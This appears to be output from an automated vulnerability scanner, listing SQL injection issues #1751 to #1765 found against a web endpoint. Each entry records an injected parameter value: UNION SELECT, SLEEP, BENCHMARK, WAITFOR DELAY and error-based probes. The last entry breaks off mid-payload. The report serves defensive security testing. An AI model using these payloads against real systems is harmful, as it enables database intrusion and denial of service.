Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1751\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT SLEEP(5)\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1752\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1753\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1754\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1' UNION SELECT 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1755\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1756\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1757\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1758\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1759\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*!10000 1/0 */\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1760Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1-false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1761\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1762\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1763\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1764\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ';waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1765\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 